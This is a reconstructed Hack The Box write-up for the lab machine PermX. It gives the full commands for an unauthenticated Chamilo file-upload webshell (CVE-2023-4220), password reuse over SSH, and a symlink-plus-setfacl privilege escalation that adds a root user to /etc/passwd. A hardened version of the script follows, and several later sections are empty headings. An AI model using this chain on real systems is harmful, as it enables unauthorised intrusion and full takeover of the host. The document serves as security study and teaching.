~ / foobarto.me / htb-machines

permx

Linux · Easy · released 2024-07-06 · retired 2024-11-02

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

PermX is an Easy Linux box. Foothold: the Chamilo LMS 1.11.24 vhost has an unauthenticated file upload in bigUpload.php (CVE-2023-4220 / CVE-2023-31803) that drops a PHP webshell as www-data. The DB password 03F6lY3uXAP2bkW8 from Chamilo's configuration.php is reused for the mtz SSH account. Privesc: mtz can sudo /opt/acl.sh, which runs setfacl on a path validated only by a string prefix check and [ -f ]; both pass for a symlink, and setfacl follows it. Symlink /etc/passwd into ~mtz/, run the script to grant yourself write on it, append a UID-0 user, then su to root.

The chain:

  1. CVE-2023-4220: an unauthenticated POST to /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported stores any file under bigupload/files/ → PHP webshell as www-data.
  2. app/config/configuration.php holds the DB credentials chamilo : 03F6lY3uXAP2bkW8; the password is reused for mtz's SSH login.
  3. sudo /opt/acl.sh mtz rwx /home/mtz/<file> runs setfacl on <file>. The script's path check is a string prefix match plus [ -f ], both of which pass for a symlink, and setfacl follows the link to its target. Symlink /etc/passwd → grant write → append r00t::0:0::/root:/bin/bash → su r00t → root.

Recon

22/tcp     OpenSSH
80/tcp     Apache → permx.htb (default)
+ vhosts: www.permx.htb, lms.permx.htb (Chamilo 1.11.24)

Foothold — CVE-2023-4220

# shell.php is a minimal webshell, e.g. <?php system($_GET['c']); ?>
# The multipart field name bigUploadFile is the one bigUpload.php reads
curl -F "bigUploadFile=@shell.php" \
   "http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported"
# No authentication needed; the file is stored under its original name in bigupload/files/:
curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/shell.php?c=id'
# www-data
$ grep db_password /var/www/chamilo/app/config/configuration.php
... 'db_password' => '03F6lY3uXAP2bkW8',
# DB user is chamilo; the password is reused for the local account mtz
$ ssh mtz@<TARGET>
Password: 03F6lY3uXAP2bkW8
$ sudo -l            # confirms mtz may run /opt/acl.sh as root
$ cat /opt/acl.sh
#!/bin/bash
user="$1"; perm="$2"; target="$3"
# String check only: any path that merely starts with /home/mtz/ passes
if [[ "$target" != /home/mtz/* ]]; then echo bad; exit 1; fi
# [ -f ] follows symlinks, so a link in ~mtz pointing at a root-owned file passes
if [ ! -f "$target" ]; then echo bad; exit 1; fi
# setfacl also follows symlinks by default (no -P), so the ACL lands on the link target
/usr/bin/setfacl -m u:"$user":"$perm" "$target"

# /home/mtz/passwd satisfies the prefix check, [ -f "$target" ] sees /etc/passwd
# through the link, and setfacl then changes the ACL of /etc/passwd itself.
$ ln -sf /etc/passwd /home/mtz/passwd
$ sudo /opt/acl.sh mtz rwx /home/mtz/passwd
$ getfacl /etc/passwd | grep mtz      # user:mtz:rwx shows the ACL hit the real file
# Empty password field = no password prompt; UID/GID 0 = root
$ echo 'r00t::0:0::/root:/bin/bash' >> /etc/passwd
$ su r00t
# id → uid=0(r00t) gid=0(root)
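
What a safe version of that check looks like, added here as an example rather than the box's /opt/acl.sh or anything from the walkthroughs: test for the link itself with [ -L ], canonicalise with realpath and compare the resolved path (not the typed string) against the allowed directory, and pass -P to setfacl so it never follows a link even if the file is swapped between check and use. /home/mtz, the user mtz and the rwx argument are carried over from the box; ALLOWED_ROOT, check_target and safe_setfacl are names chosen for this example.

```shell
#!/bin/bash
# Added example: a hardened path check for the /opt/acl.sh pattern above.
# This is not the box's script. ALLOWED_ROOT is a name chosen for this
# example; its default is the box's /home/mtz and it can be overridden.
ALLOWED_ROOT="${ALLOWED_ROOT:-/home/mtz}"

# check_target PATH
# Prints the canonical path and returns 0 only if PATH is an existing regular
# file, is not itself a symlink, and resolves (through any symlinked parent
# directory or ".." component) to a location under ALLOWED_ROOT.
check_target() {
    target="$1"
    # [ -L ] looks at the link itself; [ -f ] on its own follows it.
    [ -L "$target" ] && return 1
    [ -f "$target" ] || return 1
    # realpath -e resolves every symlink and "..", failing if the result is missing.
    real=$(realpath -e -- "$target") || return 1
    root=$(realpath -e -- "$ALLOWED_ROOT") || return 1
    # Compare the resolved path, not the string the caller typed.
    case "$real" in
        "$root"/*) printf '%s\n' "$real"; return 0 ;;
        *)         return 1 ;;
    esac
}

# safe_setfacl USER PERM PATH  (same interface as /opt/acl.sh)
safe_setfacl() {
    user="$1"; perm="$2"; target="$3"
    # Only a plain rwx- permission string; no empty or odd ACL specs.
    case "$perm" in ""|*[!rwx-]*) echo "bad perm: $perm" >&2; return 1 ;; esac
    [ -n "$user" ] || { echo "bad user" >&2; return 1; }
    real=$(check_target "$target") || { echo "bad target: $target" >&2; return 1; }
    # -P (--physical): never follow a symlink, so a file swapped for a link
    # between the check above and this call cannot redirect the ACL change.
    /usr/bin/setfacl -P -m "u:$user:$perm" "$real"
}
```

The check-then-use gap is still there (the file can be replaced between check_target and setfacl), which is why -P matters: a symlink swapped in afterwards is no longer followed to its target. Hard links are the other way to alias a root-owned file into ~mtz; fs.protected_hardlinks=1, the Ubuntu default, stops an unprivileged user from linking to files they do not own. The safest fix remains not handing a user sudo over a script that edits ACLs at all.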

Why each step worked

Counterfactuals

Source attribution

Reconstruction is grounded in:

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.
